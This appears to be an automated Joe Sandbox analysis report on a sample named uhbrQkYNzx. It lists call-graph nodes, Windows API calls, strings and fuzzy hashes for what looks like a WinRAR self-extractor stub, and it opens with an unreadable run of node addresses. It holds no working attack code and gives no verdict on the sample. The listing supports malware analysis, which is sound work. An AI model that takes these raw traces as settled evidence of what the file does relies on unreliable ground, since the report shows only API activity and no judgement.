__ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29834->30102 30099 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29836->30099 29839 99cdaf 29840 99cddd 29839->29840 29841 99cdcd 29839->29841 29842 99cddf 29839->29842 29847 99ce3e 29840->29847 30105 9919a9 26 API calls 29840->30105 30103 99a496 119 API calls 29841->30103 30104 99d3d7 135 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29842->30104 29849 99cf15 29844->29849 30107 99fd28 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29844->30107 29847->29844 30106 9919a9 26 API calls 
29847->30106 29852 99d044 29849->29852 30119 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29849->30119 29851 99d115 30048 99e772 29851->30048 29852->29787 29852->29851 29855 99d161 29852->29855 30047 99e8d9 SetEndOfFile 29852->30047 29855->29787 29857 99f58b 49 API calls 29855->29857 29856 99d159 29858 99de50 110 API calls 29856->29858 29859 99d1d2 29857->29859 29858->29855 29859->29787 30120 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29859->30120 29861 99d1e8 30121 999500 109 API calls __EH_prolog3_GS 29861->30121 29864 99233e 29863->29864 29869 992350 29863->29869 29864->29869 30313 9923b0 26 API calls 29864->30313 29865 991a66 26 API calls 29866 992369 29865->29866 30314 992ed0 26 API calls 29866->30314 29869->29865 29870 992374 30315 9924d9 26 API calls 29870->30315 29887 99e927 29886->29887 29888 99e931 29887->29888 30316 9993d7 110 API calls __EH_prolog3_GS 29887->30316 29888->29627 29890->29653 29891->29653 29893 9976f3 __EH_prolog3 29892->29893 29908 9a0aaf GetCurrentProcess GetProcessAffinityMask 29893->29908 29895 9976fd 29909 9a4f2b 28 API calls __EH_prolog3 29895->29909 29897 997874 29910 997cba GetCurrentProcess GetProcessAffinityMask 29897->29910 29899 997891 29899->29672 29901 9a028f __cftof 29900->29901 29911 9a0152 29901->29911 29904 991a66 26 API calls 29905 9a02b4 29904->29905 29906 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29905->29906 29907 9a02bf 29906->29907 29907->29673 29908->29895 29909->29897 29910->29899 29912 9925a4 26 API calls 29911->29912 29913 9a01c7 29912->29913 29913->29904 29915 9911e8 29914->29915 29916 991206 29914->29916 29918 9b56f6 28 API calls 29915->29918 29926 991a25 27 API calls 2 library calls 29916->29926 29919 9911ee 29918->29919 29921 9911f5 29919->29921 29925 9bac9e 26 API calls _abort 29919->29925 29920 99120b 29921->29681 29923->29695 29924->29687 29926->29920 29928 9b430c __EH_prolog3_GS 29927->29928 29929 9a2117 45 API calls 29928->29929 29930 9b432f 
29929->29930 29931 9a4318 53 API calls 29930->29931 29932 9b4342 29931->29932 29933 9a6a25 53 API calls 29932->29933 29934 9b434c 29933->29934 29935 991a66 26 API calls 29934->29935 29936 9b435b 29935->29936 29943 9b3ec5 29936->29943 29939 991a66 26 API calls 29940 9b4375 29939->29940 29941 9b5787 5 API calls 29940->29941 29942 9a8665 29941->29942 29942->29645 29944 9b3ed1 __EH_prolog3_GS 29943->29944 29945 9914a7 28 API calls 29944->29945 29946 9b3edd 29945->29946 29947 9b3572 21 API calls 29946->29947 29948 9b3eec 29947->29948 29949 991a66 26 API calls 29948->29949 29950 9b3ef4 29949->29950 29951 9b5787 5 API calls 29950->29951 29952 9b3ef9 29951->29952 29952->29939 29953->29712 29954->29712 29955->29710 29957 997e27 __EH_prolog3_GS 29956->29957 30126 997bfc 29957->30126 29959 997e68 29964 997ed2 29959->29964 29965 997e6c 29959->29965 29967 997ebe 29959->29967 30131 997bd6 30 API calls 29959->30131 29960 9b5787 5 API calls 29961 997ecf 29960->29961 29961->29728 29963 991a66 26 API calls 29963->29965 29964->29967 30132 99adaa CompareStringW 29964->30132 29965->29960 29967->29963 29977 9a1095 29968->29977 29969 9a1256 29970 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29969->29970 29972 99c11b 29970->29972 29971 99769f 45 API calls 29973 9a1241 29971->29973 29972->29736 30054 9a2095 45 API calls __EH_prolog3_GS 29972->30054 29974 9925a4 26 API calls 29973->29974 29975 9a124d 29974->29975 29976 991a66 26 API calls 29975->29976 29976->29969 29977->29969 29977->29971 29979 99b303 29978->29979 29980 99b33b 29979->29980 30175 999635 89 API calls 29979->30175 29980->29763 29980->29772 29982 99b333 30176 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29982->30176 29985 99b368 29984->29985 29987 99b39e 29984->29987 29985->29987 30177 9a85fd 75 API calls 29985->30177 29987->29789 29988 99b39a 29988->29987 30178 9932a1 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29988->30178 29991 99b784 __EH_prolog3_GS 29990->29991 29992 99b8e3 
29991->29992 29993 99d8b8 138 API calls 29991->29993 29994 9b5787 5 API calls 29992->29994 29995 99b7ef 29993->29995 29996 99b8ea 29994->29996 29995->29992 30179 999283 109 API calls 29995->30179 29996->29795 29998 99b817 29999 99ed0d 49 API calls 29998->29999 30000 99b81d 29999->30000 30001 99b838 30000->30001 30003 99ed1f 49 API calls 30000->30003 30181 9a1a27 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 30001->30181 30006 99b827 30003->30006 30004 99b83e 30004->29992 30182 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30004->30182 30006->30001 30180 9932a1 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30006->30180 30007 99b850 30009 997673 28 API calls 30007->30009 30011 99b859 30009->30011 30010 99b88d 30012 99eaf3 54 API calls 30010->30012 30016 99b8c9 30010->30016 30011->30010 30183 99ede9 119 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 30011->30183 30014 99b8a1 30012->30014 30015 99d8b8 138 API calls 30014->30015 30017 99b8c5 30015->30017 30018 991a66 26 API calls 30016->30018 30017->30016 30184 999283 109 API calls 30017->30184 30018->29992 30021 99fd7e 30020->30021 30023 99fd88 30020->30023 30022 9b56f6 28 API calls 30021->30022 30022->30023 30023->29803 30025 9a9639 30024->30025 30026 9a975f 30025->30026 30029 9a9644 30025->30029 30028 9b734a CallUnexpected RaiseException 30026->30028 30027 9a9739 30027->29829 30034 9a970b 30028->30034 30029->30027 30030 9a96ed 30029->30030 30032 9bd08c ___std_exception_copy 21 API calls 30029->30032 30029->30034 30030->30027 30033 9a971f 30030->30033 30030->30034 30031 9b734a CallUnexpected RaiseException 30038 9a97a3 __EH_prolog3 __cftof 30031->30038 30032->30030 30033->30027 30185 9a9556 89 API calls 4 library calls 30033->30185 30034->30031 30036 9a9896 30036->29829 30037 9bd08c ___std_exception_copy 21 API calls 30037->30038 30038->30036 30038->30037 30186 999384 89 API calls 30038->30186 30041 9a94f3 30040->30041 

Control-flow Graph
APIs
  • Part of subcall function 009A6D7B: GetModuleHandleW.KERNEL32(kernel32,1AC349C0), ref: 009A6DC7
  • Part of subcall function 009A6D7B: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009A6DD9
  • Part of subcall function 009A6D7B: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009A6E03
  • Part of subcall function 009A1309: __EH_prolog3.LIBCMT ref: 009A1310
  • Part of subcall function 009A1309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,009A17FB,?,?,\\?\,1AC349C0,?,?,?,00000000,009CA279,000000FF), ref: 009A1319
  • Part of subcall function 009AF4D4: OleInitialize.OLE32(00000000), ref: 009AF4ED
  • Part of subcall function 009AF4D4: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 009AF524
  • Part of subcall function 009AF4D4: SHGetMalloc.SHELL32(009E532C), ref: 009AF52E
• GetCommandLineW.KERNEL32 ref: 009B4608
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp,?,00000000), ref: 009B464F
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009,?,00000000), ref: 009B4661
• UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 009B466F
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,00000000), ref: 009B467D
  • Part of subcall function 009AFC38: __EH_prolog3.LIBCMT ref: 009AFC3F
  • Part of subcall function 009B3EFC: __EH_prolog3_GS.LIBCMT ref: 009B3F03
  • Part of subcall function 009B3EFC: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 009B3F1B
  • Part of subcall function 009B3EFC: SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 009B3F86
  • Part of subcall function 009A51BF: _wcslen.LIBCMT ref: 009A51E3
• UnmapViewOfFile.KERNEL32(00000000,009E5430,00000400,009E5430,009E5430,00000400,00000000,00000001,?,00000000), ref: 009B46CC
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 009B46D3
• SetEnvironmentVariableW.KERNEL32(sfxname,009D9698,00000000), ref: 009B472F
• GetLocalTime.KERNEL32(?), ref: 009B473A
• _swprintf.LIBCMT ref: 009B4779
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 009B478E
• GetModuleHandleW.KERNEL32(00000000), ref: 009B4795
• LoadIconW.USER32(00000000,00000064), ref: 009B47AC
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 009B4803
• Sleep.KERNELBASE(00001B58), ref: 009B4834
• DeleteObject.GDI32 ref: 009B4858
• DeleteObject.GDI32(17050D3A), ref: 009B4868
  • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
  • Part of subcall function 009B19EE: __EH_prolog3_GS.LIBCMT ref: 009B19F5
• CloseHandle.KERNEL32 ref: 009B48AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
• Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
Similarity
• API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
• String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
• API String ID: 3142445277-3710569615
• Opcode ID: 8eb112bbdb6d096577933c033aeeb9452921d88a8d329fc44b829535eead79c5
• Instruction ID: b0985430756f33a8d19b08ee2db24ce3d71462a20e61d56148daea5c3ec6043f
• Opcode Fuzzy Hash: 8eb112bbdb6d096577933c033aeeb9452921d88a8d329fc44b829535eead79c5
• Instruction Fuzzy Hash: 4891D1B0918384EFD320EF65DC85FAB7BECAB89704F41082DF54996192DB749D04EB62

Control-flow Graph
APIs
• FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,009B0845,00000066), ref: 009AEBE6
• SizeofResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEBFD
• LoadResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEC14
• LockResource.KERNEL32(00000000,?,?,?,009B0845,00000066), ref: 009AEC23
• GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,009B0845,00000066), ref: 009AEC3E
• GlobalLock.KERNEL32(00000000), ref: 009AEC4F
• CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 009AEC73
• GlobalUnlock.KERNEL32(00000000), ref: 009AECD7
  • Part of subcall function 009AEB06: GdipAlloc.GDIPLUS(00000010), ref: 009AEB0C
• GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 009AECB8
• GlobalFree.KERNEL32(00000000), ref: 009AECDE
Strings
Similarity
• API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
• String ID: PNG
• API String ID: 211097158-364855578
• Opcode ID: d84a78297119b6892cc054f8a7cbbfc7e1d7fa30742ca696d1019b35b8387dd3
• Instruction ID: e0128735ccdb2bd8f0fa1f4487a8c1a39e99c5a2875d5b844a2fdd1f591a1be3
• Opcode Fuzzy Hash: d84a78297119b6892cc054f8a7cbbfc7e1d7fa30742ca696d1019b35b8387dd3
• Instruction Fuzzy Hash: F13170B1A19201AFD710AF62DD48E2BBFBCFF86764B040529F945D2261EB31DC01DBA1
APIs
  • Part of subcall function 009A8781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,1AC349C0,00000007,?,?,?,009A8751,?,?,?,?,0000000C,00994426), ref: 009A879D
• _wcslen.LIBCMT ref: 009A395A
• __fprintf_l.LIBCMT ref: 009A3AA7
Strings
Similarity
• API ID: ByteCharMultiWide__fprintf_l_wcslen
• String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
• API String ID: 1796436225-285229759
• Opcode ID: 5b40d9d49fe92ea0f4c68491722e11ab76512b2229f9be1c2964b47690af61b0
• Instruction ID: 1ccdd8c00488cdd50122db7b415a93b9993ce83d1b25d220e79b825b7a80f2b9
• Opcode Fuzzy Hash: 5b40d9d49fe92ea0f4c68491722e11ab76512b2229f9be1c2964b47690af61b0
• Instruction Fuzzy Hash: 8852C471900259EBDF24DFA8CD85BEEB7B8FF45714F10452AF805AB281EB719A44CB90

Control-flow Graph
APIs
• __EH_prolog3_GS.LIBCMT ref: 0099F830
• FindFirstFileW.KERNELBASE(?,?,00000274,0099F733,000000FF,00000049,00000049,?,?,0099A684,?,?,00000000,?,?,?), ref: 0099F859
• FindFirstFileW.KERNEL32(?,?,?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049), ref: 0099F8A4
• GetLastError.KERNEL32(?,?,?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049,?,00000000), ref: 0099F902
• FindNextFileW.KERNEL32(?,?,00000274,0099F733,000000FF,00000049,00000049,?,?,0099A684,?,?,00000000,?,?,?), ref: 0099F92D
• GetLastError.KERNEL32(?,0099D303,?,?,?,?,?,?,?,1AC349C0,00000049,?,00000000), ref: 0099F93A
Similarity
• API ID: FileFind$ErrorFirstLast$H_prolog3_Next
• String ID:
• API String ID: 3831798110-0
• Opcode ID: 2fe4d48156078b82f7fec311728294c034d6106231283ba85e13fae6fcb5be7f
• Instruction ID: ae14d79aedd9abf5e5361a6dbac8b7da1015df790de09b9be45064ec72746692
• Opcode Fuzzy Hash: 2fe4d48156078b82f7fec311728294c034d6106231283ba85e13fae6fcb5be7f
• Instruction Fuzzy Hash: 10511F71904619EFCF54DF68C899BDDB7B8BF49320F1002AAE519E3290DB34AA94CF50
APIs
• _wcslen.LIBCMT ref: 0099C342
  • Part of subcall function 009A2095: __EH_prolog3_GS.LIBCMT ref: 009A209C
  • Part of subcall function 009957C0: __EH_prolog3.LIBCMT ref: 009957C7
Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3__wcslen
                                                              • String ID: __tmp_reference_source_
                                                              • API String ID: 1523997010-685763994
                                                              • Opcode ID: 9e5ff1eaa099c71124c138286d29a3e54e9335b354af26d0215a92e544bfa4f5
                                                              • Instruction ID: 1a55eb9c47b009bf883efb6b7a9fb5335d861e34b6a3513cdd9a76b964f62f7b
                                                              • Opcode Fuzzy Hash: 9e5ff1eaa099c71124c138286d29a3e54e9335b354af26d0215a92e544bfa4f5
                                                              • Instruction Fuzzy Hash: 04D2E5B09052899FDF29DFB8CC91BEEBBB8BF45304F04451EE49A97241DB34A949CB50
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000000,?,009BEC80,00000000,009D6F40,0000000C,009BEDD7,00000000,00000002,00000000), ref: 009BECCB
                                                              • TerminateProcess.KERNEL32(00000000,?,009BEC80,00000000,009D6F40,0000000C,009BEDD7,00000000,00000002,00000000), ref: 009BECD2
                                                              • ExitProcess.KERNEL32 ref: 009BECE4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: c749a8e1393df05b47bc23080d7b4a459040247dbc6827c5b897b3cf909eda01
                                                              • Instruction ID: 26feefaae751f3a4df3bd4def6a64c9ee8188db03d6712103c8bee441410b860
                                                              • Opcode Fuzzy Hash: c749a8e1393df05b47bc23080d7b4a459040247dbc6827c5b897b3cf909eda01
                                                              • Instruction Fuzzy Hash: 7FE04672814208AFCF11AF54CE08E983F2DEF81391B044424F8499A522CB36ED42EB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              • Opcode ID: a7c7b3baf14e67631b4a23cda0387620aa2debf7ac53bd3ebdd64c2283f13025
                                                              • Instruction ID: 75ee8bee4f37785b70259071c21b5ab8d02ed1954fe84178583aad0c9ed94832
                                                              • Opcode Fuzzy Hash: a7c7b3baf14e67631b4a23cda0387620aa2debf7ac53bd3ebdd64c2283f13025
                                                              • Instruction Fuzzy Hash: 95E1A3715083458FDB24CF28C984B5BBBE5BFCA308F05496DE8899B342D774E945CB92
                                                              APIs
                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 009B090A
                                                                • Part of subcall function 00991E44: GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                                • Part of subcall function 00991E44: SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              • EndDialog.USER32(?,00000000), ref: 009B0A18
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009B0A57
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009B0A71
                                                              • IsDialogMessageW.USER32(?,?), ref: 009B0A84
                                                              • TranslateMessage.USER32(?), ref: 009B0A92
                                                              • DispatchMessageW.USER32(?), ref: 009B0A9C
                                                              • EndDialog.USER32(?,00000001), ref: 009B0ADE
                                                              • GetDlgItem.USER32(?,00000068), ref: 009B0B04
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 009B0B1F
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,009CC6C8), ref: 009B0B32
                                                              • SetFocus.USER32(00000000), ref: 009B0B39
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 009B0C20
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 009B0C4C
                                                              • GetTickCount.KERNEL32 ref: 009B0C79
                                                              • GetLastError.KERNEL32(?,00000011), ref: 009B0CD5
                                                              • GetCommandLineW.KERNEL32 ref: 009B0DF9
                                                              • _wcslen.LIBCMT ref: 009B0E06
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,009E5430,00000400,00000001,00000001), ref: 009B0E85
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 009B0EA3
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 009B0EDC
                                                              • WaitForInputIdle.USER32(?,00002710), ref: 009B0F0B
                                                              • Sleep.KERNEL32(00000064), ref: 009B0F25
                                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,009E5430,00000400), ref: 009B0F61
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,009E5430,00000400), ref: 009B0F6D
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009B1072
                                                                • Part of subcall function 00991E1F: GetDlgItem.USER32(?,?), ref: 00991E34
                                                                • Part of subcall function 00991E1F: ShowWindow.USER32(00000000), ref: 00991E3B
                                                              • SetDlgItemTextW.USER32(?,00000065,009CC6C8), ref: 009B108A
                                                              • GetDlgItem.USER32(?,00000065), ref: 009B1093
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 009B10A2
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 009B1422
                                                              • EndDialog.USER32(?,00000001), ref: 009B1436
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009B10B1
                                                                • Part of subcall function 009AE265: __EH_prolog3_GS.LIBCMT ref: 009AE26C
                                                                • Part of subcall function 009AE265: ShowWindow.USER32(?,00000000,00000038), ref: 009AE294
                                                                • Part of subcall function 009AE265: GetWindowRect.USER32(?,?), ref: 009AE2D8
                                                                • Part of subcall function 009AE265: ShowWindow.USER32(?,00000005,?,00000000), ref: 009AE373
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009B114F
                                                              • SendMessageW.USER32(?,00000080,00000001,000103E5), ref: 009B1284
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,17050D3A), ref: 009B129D
                                                              • GetDlgItem.USER32(?,00000068), ref: 009B12A6
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 009B12BE
                                                              • GetDlgItem.USER32(?,00000066), ref: 009B12E6
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 009B135D
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009B1371
                                                              • EnableWindow.USER32(?,00000000), ref: 009B15A7
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 009B15E8
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 009B160D
                                                                • Part of subcall function 009B1D4F: __EH_prolog3_GS.LIBCMT ref: 009B1D59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                                              • String ID: -el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
                                                              • API String ID: 3616063595-3000381960
                                                              • Opcode ID: de78cd75216b4a09bf6ab6fc004e2e4581baea340777d961a679687ebddc0648
                                                              • Instruction ID: 902b9ce58a3bf15d33edb049a3be819409175427b5706c57f5f5d1b341134f63
                                                              • Opcode Fuzzy Hash: de78cd75216b4a09bf6ab6fc004e2e4581baea340777d961a679687ebddc0648
                                                              • Instruction Fuzzy Hash: 5572E770918388EEEF21EBA4CD89FEE7BB9AB41314F404059F105BB1A2D7B45E44DB61

                                                              Control-flow Graph (interactive graph not reproduced; function body spans basic blocks 9a6d7b through 9a73f7. Nodes on the graph call, in order: GetModuleHandleW, GetProcAddress (twice), CreateFileW, SetFilePointer, ReadFile, CloseHandle, CompareStringW, then AllocConsole, GetCurrentProcessId, AttachConsole, GetStdHandle, WriteConsoleW, Sleep, FreeConsole and ExitProcess on the path taken after a CompareStringW match.)
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32,1AC349C0), ref: 009A6DC7
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009A6DD9
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009A6E03
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A70CA
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 009A70DF
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 009A70FF
                                                              • CloseHandle.KERNEL32(00000000), ref: 009A7187
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 009A71F8
                                                              • AllocConsole.KERNEL32 ref: 009A735E
                                                              • GetCurrentProcessId.KERNEL32 ref: 009A7368
                                                              • AttachConsole.KERNEL32(00000000), ref: 009A736F
                                                              • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 009A738F
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 009A7396
                                                              • Sleep.KERNEL32(00002710), ref: 009A73A1
                                                              • FreeConsole.KERNEL32 ref: 009A73A7
                                                              • ExitProcess.KERNEL32 ref: 009A73B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                              • API String ID: 2644799563-3298887752
                                                              • Opcode ID: 62f97856180036d8214294bd5d6f068e70282c45de18459213bc96dfdf49d280
                                                              • Instruction ID: cfec5d590621df68f3fc7a7e7912b1aa6eca2f8e6e231d6c8faaa5012297ddc5
                                                              • Opcode Fuzzy Hash: 62f97856180036d8214294bd5d6f068e70282c45de18459213bc96dfdf49d280
                                                              • Instruction Fuzzy Hash: 2EF17AB18053889BCF34DFA4CC49FDE7BA9BB46308F40412DF9199B291DB709649CB92
